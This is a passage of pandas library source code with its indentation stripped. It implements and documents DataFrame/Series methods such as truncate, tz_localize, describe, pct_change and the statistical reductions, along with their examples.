)
else:
new_data = self._data.copy()
new_data.axes[block_axis] = index.shift(periods, freq)
return self._constructor(new_data).__finalize__(self)
def truncate(
self: FrameOrSeries, before=None, after=None, axis=None, copy: bool_t = True
) -> FrameOrSeries:
"""
Truncate a Series or DataFrame before and after some index value.
This is a useful shorthand for boolean indexing based on index
values above or below certain thresholds.
Parameters
----------
before : date, str, int
Truncate all rows before this index value.
after : date, str, int
Truncate all rows after this index value.
axis : {0 or 'index', 1 or 'columns'}, optional
Axis to truncate. Truncates the index (rows) by default.
copy : bool, default is True,
Return a copy of the truncated section.
Returns
-------
type of caller
The truncated Series or DataFrame.
See Also
--------
DataFrame.loc : Select a subset of a DataFrame by label.
DataFrame.iloc : Select a subset of a DataFrame by position.
Notes
-----
If the index being truncated contains only datetime values,
`before` and `after` may be specified as strings instead of
Timestamps.
Examples
--------
>>> df = pd.DataFrame({'A': ['a', 'b', 'c', 'd', 'e'],
... 'B': ['f', 'g', 'h', 'i', 'j'],
... 'C': ['k', 'l', 'm', 'n', 'o']},
... index=[1, 2, 3, 4, 5])
>>> df
A B C
1 a f k
2 b g l
3 c h m
4 d i n
5 e j o
>>> df.truncate(before=2, after=4)
A B C
2 b g l
3 c h m
4 d i n
The columns of a DataFrame can be truncated.
>>> df.truncate(before="A", after="B", axis="columns")
A B
1 a f
2 b g
3 c h
4 d i
5 e j
For Series, only rows can be truncated.
>>> df['A'].truncate(before=2, after=4)
2 b
3 c
4 d
Name: A, dtype: object
The index values in ``truncate`` can be datetimes or string
dates.
>>> dates = pd.date_range('2016-01-01', '2016-02-01', freq='s')
>>> df = pd.DataFrame(index=dates, data={'A': 1})
>>> df.tail()
A
2016-01-31 23:59:56 1
2016-01-31 23:59:57 1
2016-01-31 23:59:58 1
2016-01-31 23:59:59 1
2016-02-01 00:00:00 1
>>> df.truncate(before=pd.Timestamp('2016-01-05'),
... after=pd.Timestamp('2016-01-10')).tail()
A
2016-01-09 23:59:56 1
2016-01-09 23:59:57 1
2016-01-09 23:59:58 1
2016-01-09 23:59:59 1
2016-01-10 00:00:00 1
Because the index is a DatetimeIndex containing only dates, we can
specify `before` and `after` as strings. They will be coerced to
Timestamps before truncation.
>>> df.truncate('2016-01-05', '2016-01-10').tail()
A
2016-01-09 23:59:56 1
2016-01-09 23:59:57 1
2016-01-09 23:59:58 1
2016-01-09 23:59:59 1
2016-01-10 00:00:00 1
Note that ``truncate`` assumes a 0 value for any unspecified time
component (midnight). This differs from partial string slicing, which
returns any partially matching dates.
>>> df.loc['2016-01-05':'2016-01-10', :].tail()
A
2016-01-10 23:59:55 1
2016-01-10 23:59:56 1
2016-01-10 23:59:57 1
2016-01-10 23:59:58 1
2016-01-10 23:59:59 1
"""
if axis is None:
axis = self._stat_axis_number
axis = self._get_axis_number(axis)
ax = self._get_axis(axis)
# GH 17935
# Check that index is sorted
if not ax.is_monotonic_increasing and not ax.is_monotonic_decreasing:
raise ValueError("truncate requires a sorted index")
# if we have a date index, convert to dates, otherwise
# treat like a slice
if ax.is_all_dates:
from pandas.core.tools.datetimes import to_datetime
before = to_datetime(before)
after = to_datetime(after)
if before is not None and after is not None:
if before > after:
raise ValueError(f"Truncate: {after} must be after {before}")
slicer = [slice(None, None)] * self._AXIS_LEN
slicer[axis] = slice(before, after)
result = self.loc[tuple(slicer)]
if isinstance(ax, MultiIndex):
setattr(result, self._get_axis_name(axis), ax.truncate(before, after))
if copy:
result = result.copy()
return result
def tz_convert(
self: FrameOrSeries, tz, axis=0, level=None, copy: bool_t = True
) -> FrameOrSeries:
"""
Convert tz-aware axis to target time zone.
Parameters
----------
tz : str or tzinfo object
axis : the axis to convert
level : int, str, default None
If axis is a MultiIndex, convert a specific level. Otherwise
must be None.
copy : bool, default True
Also make a copy of the underlying data.
Returns
-------
%(klass)s
Object with time zone converted axis.
Raises
------
TypeError
If the axis is tz-naive.
"""
axis = self._get_axis_number(axis)
ax = self._get_axis(axis)
def _tz_convert(ax, tz):
if not hasattr(ax, "tz_convert"):
if len(ax) > 0:
ax_name = self._get_axis_name(axis)
raise TypeError(
f"{ax_name} is not a valid DatetimeIndex or PeriodIndex"
)
else:
ax = DatetimeIndex([], tz=tz)
else:
ax = ax.tz_convert(tz)
return ax
# if a level is given it must be a MultiIndex level or
# equivalent to the axis name
if isinstance(ax, MultiIndex):
level = ax._get_level_number(level)
new_level = _tz_convert(ax.levels[level], tz)
ax = ax.set_levels(new_level, level=level)
else:
if level not in (None, 0, ax.name):
raise ValueError(f"The level {level} is not valid")
ax = _tz_convert(ax, tz)
result = self._constructor(self._data, copy=copy)
result = result.set_axis(ax, axis=axis, inplace=False)
return result.__finalize__(self)
def tz_localize(
self: FrameOrSeries,
tz,
axis=0,
level=None,
copy: bool_t = True,
ambiguous="raise",
nonexistent: str = "raise",
) -> FrameOrSeries:
"""
Localize tz-naive index of a Series or DataFrame to target time zone.
This operation localizes the Index. To localize the values in a
timezone-naive Series, use :meth:`Series.dt.tz_localize`.
Parameters
----------
tz : str or tzinfo
axis : the axis to localize
level : int, str, default None
If axis ia a MultiIndex, localize a specific level. Otherwise
must be None.
copy : bool, default True
Also make a copy of the underlying data.
ambiguous : 'infer', bool-ndarray, 'NaT', default 'raise'
When clocks moved backward due to DST, ambiguous times may arise.
For example in Central European Time (UTC+01), when going from
03:00 DST to 02:00 non-DST, 02:30:00 local time occurs both at
00:30:00 UTC and at 01:30:00 UTC. In such a situation, the
`ambiguous` parameter dictates how ambiguous times should be
handled.
- 'infer' will attempt to infer fall dst-transition hours based on
order
- bool-ndarray where True signifies a DST time, False designates
a non-DST time (note that this flag is only applicable for
ambiguous times)
- 'NaT' will return NaT where there are ambiguous times
- 'raise' will raise an AmbiguousTimeError if there are ambiguous
times.
nonexistent : str, default 'raise'
A nonexistent time does not exist in a particular timezone
where clocks moved forward due to DST. Valid values are:
- 'shift_forward' will shift the nonexistent time forward to the
closest existing time
- 'shift_backward' will shift the nonexistent time backward to the
closest existing time
- 'NaT' will return NaT where there are nonexistent times
- timedelta objects will shift nonexistent times by the timedelta
- 'raise' will raise an NonExistentTimeError if there are
nonexistent times.
.. versionadded:: 0.24.0
Returns
-------
Series or DataFrame
Same type as the input.
Raises
------
TypeError
If the TimeSeries is tz-aware and tz is not None.
Examples
--------
Localize local times:
>>> s = pd.Series([1],
... index=pd.DatetimeIndex(['2018-09-15 01:30:00']))
>>> s.tz_localize('CET')
2018-09-15 01:30:00+02:00 1
dtype: int64
Be careful with DST changes. When there is sequential data, pandas
can infer the DST time:
>>> s = pd.Series(range(7),
... index=pd.DatetimeIndex(['2018-10-28 01:30:00',
... '2018-10-28 02:00:00',
... '2018-10-28 02:30:00',
... '2018-10-28 02:00:00',
... '2018-10-28 02:30:00',
... '2018-10-28 03:00:00',
... '2018-10-28 03:30:00']))
>>> s.tz_localize('CET', ambiguous='infer')
2018-10-28 01:30:00+02:00 0
2018-10-28 02:00:00+02:00 1
2018-10-28 02:30:00+02:00 2
2018-10-28 02:00:00+01:00 3
2018-10-28 02:30:00+01:00 4
2018-10-28 03:00:00+01:00 5
2018-10-28 03:30:00+01:00 6
dtype: int64
In some cases, inferring the DST is impossible. In such cases, you can
pass an ndarray to the ambiguous parameter to set the DST explicitly
>>> s = pd.Series(range(3),
... index=pd.DatetimeIndex(['2018-10-28 01:20:00',
... '2018-10-28 02:36:00',
... '2018-10-28 03:46:00']))
>>> s.tz_localize('CET', ambiguous=np.array([True, True, False]))
2018-10-28 01:20:00+02:00 0
2018-10-28 02:36:00+02:00 1
2018-10-28 03:46:00+01:00 2
dtype: int64
If the DST transition causes nonexistent times, you can shift these
dates forward or backwards with a timedelta object or `'shift_forward'`
or `'shift_backwards'`.
>>> s = pd.Series(range(2),
... index=pd.DatetimeIndex(['2015-03-29 02:30:00',
... '2015-03-29 03:30:00']))
>>> s.tz_localize('Europe/Warsaw', nonexistent='shift_forward')
2015-03-29 03:00:00+02:00 0
2015-03-29 03:30:00+02:00 1
dtype: int64
>>> s.tz_localize('Europe/Warsaw', nonexistent='shift_backward')
2015-03-29 01:59:59.999999999+01:00 0
2015-03-29 03:30:00+02:00 1
dtype: int64
>>> s.tz_localize('Europe/Warsaw', nonexistent=pd.Timedelta('1H'))
2015-03-29 03:30:00+02:00 0
2015-03-29 03:30:00+02:00 1
dtype: int64
"""
nonexistent_options = ("raise", "NaT", "shift_forward", "shift_backward")
if nonexistent not in nonexistent_options and not isinstance(
nonexistent, timedelta
):
raise ValueError(
"The nonexistent argument must be one of 'raise', "
"'NaT', 'shift_forward', 'shift_backward' or "
"a timedelta object"
)
axis = self._get_axis_number(axis)
ax = self._get_axis(axis)
def _tz_localize(ax, tz, ambiguous, nonexistent):
if not hasattr(ax, "tz_localize"):
if len(ax) > 0:
ax_name = self._get_axis_name(axis)
raise TypeError(
f"{ax_name} is not a valid DatetimeIndex or PeriodIndex"
)
else:
ax = DatetimeIndex([], tz=tz)
else:
ax = ax.tz_localize(tz, ambiguous=ambiguous, nonexistent=nonexistent)
return ax
# if a level is given it must be a MultiIndex level or
# equivalent to the axis name
if isinstance(ax, MultiIndex):
level = ax._get_level_number(level)
new_level = _tz_localize(ax.levels[level], tz, ambiguous, nonexistent)
ax = ax.set_levels(new_level, level=level)
else:
if level not in (None, 0, ax.name):
raise ValueError(f"The level {level} is not valid")
ax = _tz_localize(ax, tz, ambiguous, nonexistent)
result = self._constructor(self._data, copy=copy)
result = result.set_axis(ax, axis=axis, inplace=False)
return result.__finalize__(self)
# ----------------------------------------------------------------------
# Numeric Methods
def abs(self: FrameOrSeries) -> FrameOrSeries:
"""
Return a Series/DataFrame with absolute numeric value of each element.
This function only applies to elements that are all numeric.
Returns
-------
abs
Series/DataFrame containing the absolute value of each element.
See Also
--------
numpy.absolute : Calculate the absolute value element-wise.
Notes
-----
For ``complex`` inputs, ``1.2 + 1j``, the absolute value is
:math:`\\sqrt{ a^2 + b^2 }`.
Examples
--------
Absolute numeric values in a Series.
>>> s = pd.Series([-1.10, 2, -3.33, 4])
>>> s.abs()
0 1.10
1 2.00
2 3.33
3 4.00
dtype: float64
Absolute numeric values in a Series with complex numbers.
>>> s = pd.Series([1.2 + 1j])
>>> s.abs()
0 1.56205
dtype: float64
Absolute numeric values in a Series with a Timedelta element.
>>> s = pd.Series([pd.Timedelta('1 days')])
>>> s.abs()
0 1 days
dtype: timedelta64[ns]
Select rows with data closest to certain value using argsort (from
`StackOverflow <https://stackoverflow.com/a/17758115>`__).
>>> df = pd.DataFrame({
... 'a': [4, 5, 6, 7],
... 'b': [10, 20, 30, 40],
... 'c': [100, 50, -30, -50]
... })
>>> df
a b c
0 4 10 100
1 5 20 50
2 6 30 -30
3 7 40 -50
>>> df.loc[(df.c - 43).abs().argsort()]
a b c
1 5 20 50
0 4 10 100
2 6 30 -30
3 7 40 -50
"""
return np.abs(self)
def describe(
self: FrameOrSeries, percentiles=None, include=None, exclude=None
) -> FrameOrSeries:
"""
Generate descriptive statistics.
Descriptive statistics include those that summarize the central
tendency, dispersion and shape of a
dataset's distribution, excluding ``NaN`` values.
Analyzes both numeric and object series, as well
as ``DataFrame`` column sets of mixed data types. The output
will vary depending on what is provided. Refer to the notes
below for more detail.
Parameters
----------
percentiles : list-like of numbers, optional
The percentiles to include in the output. All should
fall between 0 and 1. The default is
``[.25, .5, .75]``, which returns the 25th, 50th, and
75th percentiles.
include : 'all', list-like of dtypes or None (default), optional
A white list of data types to include in the result. Ignored
for ``Series``. Here are the options:
- 'all' : All columns of the input will be included in the output.
- A list-like of dtypes : Limits the results to the
provided data types.
To limit the result to numeric types submit
``numpy.number``. To limit it instead to object columns submit
the ``numpy.object`` data type. Strings
can also be used in the style of
``select_dtypes`` (e.g. ``df.describe(include=['O'])``). To
select pandas categorical columns, use ``'category'``
- None (default) : The result will include all numeric columns.
exclude : list-like of dtypes or None (default), optional,
A black list of data types to omit from the result. Ignored
for ``Series``. Here are the options:
- A list-like of dtypes : Excludes the provided data types
from the result. To exclude numeric types submit
``numpy.number``. To exclude object columns submit the data
type ``numpy.object``. Strings can also be used in the style of
``select_dtypes`` (e.g. ``df.describe(include=['O'])``). To
exclude pandas categorical columns, use ``'category'``
- None (default) : The result will exclude nothing.
Returns
-------
Series or DataFrame
Summary statistics of the Series or Dataframe provided.
See Also
--------
DataFrame.count: Count number of non-NA/null observations.
DataFrame.max: Maximum of the values in the object.
DataFrame.min: Minimum of the values in the object.
DataFrame.mean: Mean of the values.
DataFrame.std: Standard deviation of the observations.
DataFrame.select_dtypes: Subset of a DataFrame including/excluding
columns based on their dtype.
Notes
-----
For numeric data, the result's index will include ``count``,
``mean``, ``std``, ``min``, ``max`` as well as lower, ``50`` and
upper percentiles. By default the lower percentile is ``25`` and the
upper percentile is ``75``. The ``50`` percentile is the
same as the median.
For object data (e.g. strings or timestamps), the result's index
will include ``count``, ``unique``, ``top``, and ``freq``. The ``top``
is the most common value. The ``freq`` is the most common value's
frequency. Timestamps also include the ``first`` and ``last`` items.
If multiple object values have the highest count, then the
``count`` and ``top`` results will be arbitrarily chosen from
among those with the highest count.
For mixed data types provided via a ``DataFrame``, the default is to
return only an analysis of numeric columns. If the dataframe consists
only of object and categorical data without any numeric columns, the
default is to return an analysis of both the object and categorical
columns. If ``include='all'`` is provided as an option, the result
will include a union of attributes of each type.
The `include` and `exclude` parameters can be used to limit
which columns in a ``DataFrame`` are analyzed for the output.
The parameters are ignored when analyzing a ``Series``.
Examples
--------
Describing a numeric ``Series``.
>>> s = pd.Series([1, 2, 3])
>>> s.describe()
count 3.0
mean 2.0
std 1.0
min 1.0
25% 1.5
50% 2.0
75% 2.5
max 3.0
dtype: float64
Describing a categorical ``Series``.
>>> s = pd.Series(['a', 'a', 'b', 'c'])
>>> s.describe()
count 4
unique 3
top a
freq 2
dtype: object
Describing a timestamp ``Series``.
>>> s = pd.Series([
... np.datetime64("2000-01-01"),
... np.datetime64("2010-01-01"),
... np.datetime64("2010-01-01")
... ])
>>> s.describe()
count 3
unique 2
top 2010-01-01 00:00:00
freq 2
first 2000-01-01 00:00:00
last 2010-01-01 00:00:00
dtype: object
Describing a ``DataFrame``. By default only numeric fields
are returned.
>>> df = pd.DataFrame({'categorical': pd.Categorical(['d','e','f']),
... 'numeric': [1, 2, 3],
... 'object': ['a', 'b', 'c']
... })
>>> df.describe()
numeric
count 3.0
mean 2.0
std 1.0
min 1.0
25% 1.5
50% 2.0
75% 2.5
max 3.0
Describing all columns of a ``DataFrame`` regardless of data type.
>>> df.describe(include='all')
categorical numeric object
count 3 3.0 3
unique 3 NaN 3
top f NaN c
freq 1 NaN 1
mean NaN 2.0 NaN
std NaN 1.0 NaN
min NaN 1.0 NaN
25% NaN 1.5 NaN
50% NaN 2.0 NaN
75% NaN 2.5 NaN
max NaN 3.0 NaN
Describing a column from a ``DataFrame`` by accessing it as
an attribute.
>>> df.numeric.describe()
count 3.0
mean 2.0
std 1.0
min 1.0
25% 1.5
50% 2.0
75% 2.5
max 3.0
Name: numeric, dtype: float64
Including only numeric columns in a ``DataFrame`` description.
>>> df.describe(include=[np.number])
numeric
count 3.0
mean 2.0
std 1.0
min 1.0
25% 1.5
50% 2.0
75% 2.5
max 3.0
Including only string columns in a ``DataFrame`` description.
>>> df.describe(include=[np.object])
object
count 3
unique 3
top c
freq 1
Including only categorical columns from a ``DataFrame`` description.
>>> df.describe(include=['category'])
categorical
count 3
unique 3
top f
freq 1
Excluding numeric columns from a ``DataFrame`` description.
>>> df.describe(exclude=[np.number])
categorical object
count 3 3
unique 3 3
top f c
freq 1 1
Excluding object columns from a ``DataFrame`` description.
>>> df.describe(exclude=[np.object])
categorical numeric
count 3 3.0
unique 3 NaN
top f NaN
freq 1 NaN
mean NaN 2.0
std NaN 1.0
min NaN 1.0
25% NaN 1.5
50% NaN 2.0
75% NaN 2.5
max NaN 3.0
"""
if self.ndim == 2 and self.columns.size == 0:
raise ValueError("Cannot describe a DataFrame without columns")
if percentiles is not None:
# explicit conversion of `percentiles` to list
percentiles = list(percentiles)
# get them all to be in [0, 1]
validate_percentile(percentiles)
# median should always be included
if 0.5 not in percentiles:
percentiles.append(0.5)
percentiles = np.asarray(percentiles)
else:
percentiles = np.array([0.25, 0.5, 0.75])
# sort and check for duplicates
unique_pcts = np.unique(percentiles)
if len(unique_pcts) < len(percentiles):
raise ValueError("percentiles cannot contain duplicates")
percentiles = unique_pcts
formatted_percentiles = format_percentiles(percentiles)
def describe_numeric_1d(series):
stat_index = (
["count", "mean", "std", "min"] + formatted_percentiles + ["max"]
)
d = (
[series.count(), series.mean(), series.std(), series.min()]
+ series.quantile(percentiles).tolist()
+ [series.max()]
)
return pd.Series(d, index=stat_index, name=series.name)
def describe_categorical_1d(data):
names = ["count", "unique"]
objcounts = data.value_counts()
count_unique = len(objcounts[objcounts != 0])
result = [data.count(), count_unique]
dtype = None
if result[1] > 0:
top, freq = objcounts.index[0], objcounts.iloc[0]
names += ["top", "freq"]
result += [top, freq]
# If the DataFrame is empty, set 'top' and 'freq' to None
# to maintain output shape consistency
else:
names += ["top", "freq"]
result += [np.nan, np.nan]
dtype = "object"
return pd.Series(result, index=names, name=data.name, dtype=dtype)
def describe_timestamp_1d(data):
# GH-30164
stat_index = ["count", "mean", "min"] + formatted_percentiles + ["max"]
d = (
[data.count(), data.mean(), data.min()]
+ data.quantile(percentiles).tolist()
+ [data.max()]
)
return pd.Series(d, index=stat_index, name=data.name)
def describe_1d(data):
if is_bool_dtype(data):
return describe_categorical_1d(data)
elif is_numeric_dtype(data):
return describe_numeric_1d(data)
elif is_datetime64_any_dtype(data):
return describe_timestamp_1d(data)
elif is_timedelta64_dtype(data):
return describe_numeric_1d(data)
else:
return describe_categorical_1d(data)
if self.ndim == 1:
return describe_1d(self)
elif (include is None) and (exclude is None):
# when some numerics are found, keep only numerics
data = self.select_dtypes(include=[np.number])
if len(data.columns) == 0:
data = self
elif include == "all":
if exclude is not None:
msg = "exclude must be None when include is 'all'"
raise ValueError(msg)
data = self
else:
data = self.select_dtypes(include=include, exclude=exclude)
ldesc = [describe_1d(s) for _, s in data.items()]
# set a convenient order for rows
names: List[Optional[Hashable]] = []
ldesc_indexes = sorted((x.index for x in ldesc), key=len)
for idxnames in ldesc_indexes:
for name in idxnames:
if name not in names:
names.append(name)
d = pd.concat([x.reindex(names, copy=False) for x in ldesc], axis=1, sort=False)
d.columns = data.columns.copy()
return d
_shared_docs[
"pct_change"
] = """
Percentage change between the current and a prior element.
Computes the percentage change from the immediately previous row by
default. This is useful in comparing the percentage of change in a time
series of elements.
Parameters
----------
periods : int, default 1
Periods to shift for forming percent change.
fill_method : str, default 'pad'
How to handle NAs before computing percent changes.
limit : int, default None
The number of consecutive NAs to fill before stopping.
freq : DateOffset, timedelta, or str, optional
Increment to use from time series API (e.g. 'M' or BDay()).
**kwargs
Additional keyword arguments are passed into
`DataFrame.shift` or `Series.shift`.
Returns
-------
chg : Series or DataFrame
The same type as the calling object.
See Also
--------
Series.diff : Compute the difference of two elements in a Series.
DataFrame.diff : Compute the difference of two elements in a DataFrame.
Series.shift : Shift the index by some number of periods.
DataFrame.shift : Shift the index by some number of periods.
Examples
--------
**Series**
>>> s = pd.Series([90, 91, 85])
>>> s
0 90
1 91
2 85
dtype: int64
>>> s.pct_change()
0 NaN
1 0.011111
2 -0.065934
dtype: float64
>>> s.pct_change(periods=2)
0 NaN
1 NaN
2 -0.055556
dtype: float64
See the percentage change in a Series where filling NAs with last
valid observation forward to next valid.
>>> s = pd.Series([90, 91, None, 85])
>>> s
0 90.0
1 91.0
2 NaN
3 85.0
dtype: float64
>>> s.pct_change(fill_method='ffill')
0 NaN
1 0.011111
2 0.000000
3 -0.065934
dtype: float64
**DataFrame**
Percentage change in French franc, Deutsche Mark, and Italian lira from
1980-01-01 to 1980-03-01.
>>> df = pd.DataFrame({
... 'FR': [4.0405, 4.0963, 4.3149],
... 'GR': [1.7246, 1.7482, 1.8519],
... 'IT': [804.74, 810.01, 860.13]},
... index=['1980-01-01', '1980-02-01', '1980-03-01'])
>>> df
FR GR IT
1980-01-01 4.0405 1.7246 804.74
1980-02-01 4.0963 1.7482 810.01
1980-03-01 4.3149 1.8519 860.13
>>> df.pct_change()
FR GR IT
1980-01-01 NaN NaN NaN
1980-02-01 0.013810 0.013684 0.006549
1980-03-01 0.053365 0.059318 0.061876
Percentage of change in GOOG and APPL stock volume. Shows computing
the percentage change between columns.
>>> df = pd.DataFrame({
... '2016': [1769950, 30586265],
... '2015': [1500923, 40912316],
... '2014': [1371819, 41403351]},
... index=['GOOG', 'APPL'])
>>> df
2016 2015 2014
GOOG 1769950 1500923 1371819
APPL 30586265 40912316 41403351
>>> df.pct_change(axis='columns')
2016 2015 2014
GOOG NaN -0.151997 -0.086016
APPL NaN 0.337604 0.012002
"""
@Appender(_shared_docs["pct_change"] % _shared_doc_kwargs)
def pct_change(
self: FrameOrSeries,
periods=1,
fill_method="pad",
limit=None,
freq=None,
**kwargs,
) -> FrameOrSeries:
# TODO: Not sure if above is correct - need someone to confirm.
axis = self._get_axis_number(kwargs.pop("axis", self._stat_axis_name))
if fill_method is None:
data = self
else:
data = self._ensure_type(
self.fillna(method=fill_method, axis=axis, limit=limit)
)
rs = data.div(data.shift(periods=periods, freq=freq, axis=axis, **kwargs)) - 1
if freq is not None:
# Shift method is implemented differently when freq is not None
# We want to restore the original index
rs = rs.loc[~rs.index.duplicated()]
rs = rs.reindex_like(data)
return rs
def _agg_by_level(self, name, axis=0, level=0, skipna=True, **kwargs):
if axis is None:
raise ValueError("Must specify 'axis' when aggregating by level.")
grouped = self.groupby(level=level, axis=axis, sort=False)
if hasattr(grouped, name) and skipna:
return getattr(grouped, name)(**kwargs)
axis = self._get_axis_number(axis)
method = getattr(type(self), name)
applyf = lambda x: method(x, axis=axis, skipna=skipna, **kwargs)
return grouped.aggregate(applyf)
@classmethod
def _add_numeric_operations(cls):
"""
Add the operations to the cls; evaluate the doc strings again
"""
axis_descr, name, name2 = _doc_parms(cls)
cls.any = _make_logical_function(
cls,
"any",
name,
name2,
axis_descr,
_any_desc,
nanops.nanany,
_any_see_also,
_any_examples,
empty_value=False,
)
cls.all = _make_logical_function(
cls,
"all",
name,
name2,
axis_descr,
_all_desc,
nanops.nanall,
_all_see_also,
_all_examples,
empty_value=True,
)
@Substitution(
desc="Return the mean absolute deviation of the values "
"for the requested axis.",
name1=name,
name2=name2,
axis_descr=axis_descr,
min_count="",
see_also="",
examples="",
)
@Appender(_num_doc_mad)
def mad(self, axis=None, skipna=None, level=None):
if skipna is None:
skipna = True
if axis is None:
axis = self._stat_axis_number
if level is not None:
return self._agg_by_level("mad", axis=axis, level=level, skipna=skipna)
data = self._get_numeric_data()
if axis == 0:
demeaned = data - data.mean(axis=0)
else:
demeaned = data.sub(data.mean(axis=1), axis=0)
return np.abs(demeaned).mean(axis=axis, skipna=skipna)
cls.mad = mad
cls.sem = _make_stat_function_ddof(
cls,
"sem",
name,
name2,
axis_descr,
"Return unbiased standard error of the mean over requested "
"axis.\n\nNormalized by N-1 by default. This can be changed "
"using the ddof argument",
nanops.nansem,
)
cls.var = _make_stat_function_ddof(
cls,
"var",
name,
name2,
axis_descr,
"Return unbiased variance over requested axis.\n\nNormalized by "
"N-1 by default. This can be changed using the ddof argument",
nanops.nanvar,
)
cls.std = _make_stat_function_ddof(
cls,
"std",
name,
name2,
axis_descr,
"Return sample standard deviation over requested axis."
"\n\nNormalized by N-1 by default. This can be changed using the "
"ddof argument",
nanops.nanstd,
)
cls.cummin = _make_cum_function(
cls,
"cummin",
name,
name2,
axis_descr,
"minimum",
np.minimum.accumulate,
"min",
np.inf,
np.nan,
_cummin_examples,
)
cls.cumsum = _make_cum_function(
cls,
"cumsum",
name,
name2,
axis_descr,
"sum",
np.cumsum,
"sum",
0.0,
np.nan,
_cumsum_examples,
)
cls.cumprod = _make_cum_function(
cls,
"cumprod",
name,
name2,
axis_descr,
"product",
np.cumprod,
"prod",
1.0,
np.nan,
_cumprod_examples,
)
cls.cummax = _make_cum_function(
cls,
"cummax",
name,
name2,
axis_descr,
"maximum",
np.maximum.accumulate,
"max",
-np.inf,
np.nan,
_cummax_examples,
)
cls.sum = _make_min_count_stat_function(
cls,
"sum",
name,
name2,
axis_descr,
"""Return the sum of the values for the requested axis.\n
This is equivalent to the method ``numpy.sum``.""",
nanops.nansum,
_stat_func_see_also,
_sum_examples,
)
cls.mean = _make_stat_function(
cls,
"mean",
name,
name2,
axis_descr,
"Return the mean of the values for the requested axis.",
nanops.nanmean,
)
cls.skew = _make_stat_function(
cls,
"skew",
name,
name2,
axis_descr,
"Return unbiased skew over requested axis.\n\nNormalized by N-1.",
nanops.nanskew,
)
cls.kurt = _make_stat_function(
cls,
"kurt",
name,
name2,
axis_descr,
"Return unbiased kurtosis over requested axis.\n\n"
"Kurtosis obtained using Fisher's definition of\n"
"kurtosis (kurtosis of normal == 0.0). Normalized "
"by N-1.",
nanops.nankurt,
)
cls.kurtosis = cls.kurt
cls.prod = _make_min_count_stat_function(
cls,
"prod",
name,
name2,
axis_descr,
"Return the product of the values for the requested axis.",
nanops.nanprod,
examples=_prod_examples,
)
cls.product = cls.prod
cls.median = _make_stat_function(
cls,
"median",
name,
name2,
axis_descr,
"Return the median of the values for the requested axis.",
nanops.nanmedian,
)
cls.max = _make_stat_function(
cls,
"max",
name,
name2,
axis_descr,
"""Return the maximum of the values for the requested axis.\n
If you want the *index* of the maximum, use ``idxmax``. This is
the equivalent of the ``numpy.ndarray`` method ``argmax``.""",
nanops.nanmax,
_stat_func_see_also,
_max_examples,
)
cls.min = _make_stat_function(
cls,
"min",
name,
name2,
axis_descr,
"""Return the minimum of the values for the requested axis.\n
If you want the *index* of the minimum, use ``idxmin``. This is
the equivalent of the ``numpy.ndarray`` method ``argmin``.""",
nanops.nanmin,
_stat_func_see_also,
_min_examples,
)
@classmethod
def _add_series_or_dataframe_operations(cls):
"""
Add the series or dataframe only operations to the cls; evaluate
the doc strings again.
"""
from pandas.core.window import EWM, Expanding, Rolling, Window
@Appender(Rolling.__doc__)
def rolling(
self,
window,
min_periods=None,
center=False,
win_type=None,
on=None,
axis=0,
closed=None,
):
axis = self._get_axis_number(axis)
if win_type is not None:
return Window(
self,
window=window,
min_periods=min_periods,
center=center,
win_type=win_type,
on=on,
axis=axis,
closed=closed,
)
return Rolling(
self,
window=window,
min_periods=min_periods,
center=center,
win_type=win_type,
on=on,
axis=axis,
closed=closed,
)
cls.rolling = rolling
@Appender(Expanding.__doc__)
def expanding(self, min_periods=1, center=False, axis=0):
axis = self._get_axis_number(axis)
return Expanding(self, min_periods=min_periods, center=center, axis=axis)
cls.expanding = expanding
@Appender(EWM.__doc__)
def ewm(
self,
com=None,
span=None,
halflife=None,
alpha=None,
min_periods=0,
adjust=True,
ignore_na=False,
axis=0,
):
axis = self._get_axis_number(axis)
return EWM(
self,
com=com,
span=span,
halflife=halflife,
alpha=alpha,
min_periods=min_periods,
adjust=adjust,
ignore_na=ignore_na,
axis=axis,
)
cls.ewm = ewm
@Appender(_shared_docs["transform"] % dict(axis="", **_shared_doc_kwargs))
def transform(self, func, *args, **kwargs):
result = self.agg(func, *args, **kwargs)
if is_scalar(result) or len(result) != len(self):
raise ValueError("transforms cannot produce aggregated results")
return result
# ----------------------------------------------------------------------
# Misc methods
_shared_docs[
"valid_index"
] = """
Return index for %(position)s non-NA/null value.
Returns
-------
scalar : type of index
Notes
-----
If all elements are non-NA/null, returns None.
Also returns None for empty %(klass)s.
"""
def _find_valid_index(self, how: str):
"""
Retrieves the index of the first valid value.
Parameters
----------
how : {'first', 'last'}
Use this parameter to change between the first or last valid index.
Returns
-------
idx_first_valid : type of index
"""
idxpos = find_valid_index(self._values, how)
if idxpos is None:
return None
return self.index[idxpos]
@Appender(
_shared_docs["valid_index"] % {"position": "first", "klass": "Series/DataFrame"}
)
def first_valid_index(self):
return self._find_valid_index("first")
@Appender(
_shared_docs["valid_index"] % {"position": "last", "klass": "Series/DataFrame"}
)
def last_valid_index(self):
return self._find_valid_index("last")
def _doc_parms(cls):
"""Return a tuple of the doc parms."""
axis_descr = (
f"{{{', '.join(f'{a} ({i})' for i, a in enumerate(cls._AXIS_ORDERS))}}}"
)
name = cls._constructor_sliced.__name__ if cls._AXIS_LEN > 1 else "scalar"
name2 = cls.__name__
return axis_descr, name, name2
_num_doc = """
%(desc)s
Parameters
----------
axis : %(axis_descr)s
Axis for the function to be applied on.
skipna : bool, default True
Exclude NA/null values when computing the result.
level : int or level name, default None
If the axis is a MultiIndex (hierarchical), count along a
particular level, collapsing into a %(name1)s.
numeric_only : bool, default None
Include only float, int, boolean columns. If None, will attempt to use
everything, then use only numeric data. Not implemented for Series.
%(min_count)s\
**kwargs
Additional keyword arguments to be passed to the function.
Returns
-------
%(name1)s or %(name2)s (if level specified)\
%(see_also)s\
%(examples)s
"""
_num_doc_mad = """
%(desc)s
Parameters
----------
axis : %(axis_descr)s
Axis for the function to be applied on.
skipna : bool, default None
Exclude NA/null values when computing the result.
level : int or level name, default None
If the axis is a MultiIndex (hierarchical), count along a
particular level, collapsing into a %(name1)s.
Returns
-------
%(name1)s or %(name2)s (if level specified)\
%(see_also)s\
%(examples)s
"""
_num_ddof_doc = """
%(desc)s
Parameters
----------
axis : %(axis_descr)s
skipna : bool, default True
Exclude NA/null values. If an entire row/column is NA, the result
will be NA.
level : int or level name, default None
If the axis is a MultiIndex (hierarchical), count along a
particular level, collapsing into a %(name1)s.
ddof : int, default 1
Delta Degrees of Freedom. The divisor used in calculations is N - ddof,
where N represents the number of elements.
numeric_only : bool, default None
Include only float, int, boolean columns. If None, will attempt to use
everything, then use only numeric data. Not implemented for Series.
Returns
-------
